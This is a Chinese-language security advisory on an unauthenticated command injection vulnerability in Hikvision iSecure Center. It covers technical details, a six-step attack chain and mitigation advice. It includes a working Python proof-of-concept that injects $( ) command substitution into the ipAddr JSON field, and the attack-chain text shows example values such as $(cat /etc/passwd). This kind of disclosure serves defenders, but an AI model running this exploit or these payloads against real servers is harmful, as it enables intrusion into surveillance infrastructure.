CVE-2024-58274 Hikvision iSecure Center命令注入漏洞

漏洞信息

漏洞编号

CVE-2024-58274

漏洞类型

命令注入（Command Injection）

CVSS评分

8.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Hikvision CSMP (Comprehensive Security Management Platform) iSecure Center

漏洞概述

CVE-2024-58274是海康威视综合安防管理平台iSecure Center（CSMP）中存在的一个高危命令注入漏洞。该漏洞存在于/center/api/installation/detection接口中，攻击者可以通过构造包含$( )命令替换语法的JSON数据，在目标服务器上执行任意系统命令。

该漏洞的CVSS评分为8.3分，属于高危级别。其攻击向量为网络攻击（AV:N），攻击复杂度低（AC:L），无需任何权限认证（PR:N），也无需用户交互（UI:N）。漏洞影响范围涵盖海康威视iSecure Center截至2024年8月1日之前的所有版本。

此漏洞已在2024年至2025年间被攻击者在野利用（exploited in the wild），表明该漏洞已被黑客组织掌握并用于实际攻击活动中。由于iSecure Center是海康威视面向中大型企业、园区和城市级安防场景的核心管理平台，一旦被攻陷将导致严重的安全风险，包括视频监控系统被控制、安防数据泄露、横向移动攻击等。该漏洞的危害性不容小觑，安全运维人员应高度重视并及时修复。

技术细节

该漏洞的核心原理在于iSecure Center的/center/api/installation/detection接口对用户提交的JSON数据未进行充分的输入验证和过滤。攻击者可以在JSON数据中注入形如$(command)的Shell命令替换语法，当服务端处理该JSON数据时，会将其中的命令字符串在操作系统层面进行解析和执行。

具体技术细节如下：
1. 漏洞入口点：/center/api/installation/detection接口
2. 注入方式：通过JSON数据字段传递包含$( )语法的恶意负载
3. 执行原理：服务端在处理JSON数据时未对特殊字符进行转义或过滤，导致Shell命令替换语法被解析执行
4. 利用条件：无需身份认证即可访问该接口
5. 实际影响：可执行任意系统命令，获取服务器控制权限

从技术角度看，$( )是Bash等Shell中的命令替换语法。当服务端使用eval、system或类似函数处理用户输入时，$(command)中的command部分会被Shell解析器执行。这种类型的命令注入漏洞通常出现在以下场景：服务端将用户输入拼接到Shell命令中执行、未对用户输入进行白名单过滤或安全编码、使用的库函数本身存在命令执行风险。

由于该漏洞已被在野利用，攻击者可以通过简单的HTTP POST请求即可利用该漏洞，攻击门槛极低，潜在影响面广泛。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过网络扫描或Shodan等工具发现暴露在公网的Hikvision iSecure Center管理平台，识别目标版本信息。

STEP 2

步骤2：漏洞探测

攻击者向/center/api/installation/detection接口发送包含测试payload的JSON数据，验证目标是否存在命令注入漏洞。

STEP 3

步骤3：构造恶意请求

攻击者构造包含$( )命令替换语法的JSON数据，例如将ipAddr字段设置为$(whoami)或$(cat /etc/passwd)等。

STEP 4

步骤4：命令执行

服务端处理JSON数据时未对特殊字符进行过滤，导致$( )中的Shell命令被解析执行，攻击者获得系统命令执行能力。

STEP 5

步骤5：权限提升与持久化

攻击者通过命令执行获取服务器权限后，可能植入后门、创建恶意用户或利用其他漏洞进行权限提升和持久化控制。

STEP 6

步骤6：横向移动与数据窃取

攻击者利用已控制的安防管理服务器作为跳板，对内网其他系统进行横向移动，窃取敏感监控数据或破坏安防系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2024-58274 - Hikvision iSecure Center Command Injection PoC
# Vulnerability: Command Injection via /center/api/installation/detection endpoint
# Payload injection through $( ) command substitution syntax in JSON data

import requests
import json

TARGET_URL = "https://target-host"
VULNERABLE_ENDPOINT = "/center/api/installation/detection"

def exploit(target_url, command):
    """
    Exploit CVE-2024-58274 by injecting OS commands via $( ) syntax
    in the JSON payload sent to the installation detection endpoint.
    """
    url = f"{target_url}{VULNERABLE_ENDPOINT}"
    
    # Construct malicious JSON payload with command substitution
    payload = {
        "ipAddr": f"$( {command} )",
        "port": "80"
    }
    
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0"
    }
    
    try:
        response = requests.post(
            url,
            data=json.dumps(payload),
            headers=headers,
            verify=False,
            timeout=10
        )
        print(f"[+] Status Code: {response.status_code}")
        print(f"[+] Response: {response.text}")
        return response
    except Exception as e:
        print(f"[-] Error: {e}")
        return None

# Example usage - execute arbitrary command
if __name__ == "__main__":
    # Command to execute on the target server
    cmd = "id"  # Change to any desired command
    exploit(TARGET_URL, cmd)

# Nuclei template reference:
# https://github.com/ahisec/nuclei-tps/blob/main/http/vulnerabilities/hikvision/hikvision-csmp-installation-rce.yaml

影响范围

Hikvision iSecure Center <= 2024-08-01

防御指南

临时缓解措施

在官方发布安全补丁之前，建议采取以下临时缓解措施：1）通过防火墙或访问控制列表（ACL）限制/center/api/installation/detection接口仅允许内网或特定可信IP访问；2）部署Web应用防火墙（WAF），添加针对命令注入攻击的检测规则，过滤包含$( )、反引号等Shell特殊字符的HTTP请求体；3）关闭iSecure Center的对外网络暴露，将其部署在内部网络环境中；4）对JSON请求体中的所有字段进行严格的输入校验，禁止包含特殊Shell元字符；5）加强安全监控，及时发现和阻断异常的命令执行行为；6）定期检查服务器日志，排查是否存在被利用的痕迹。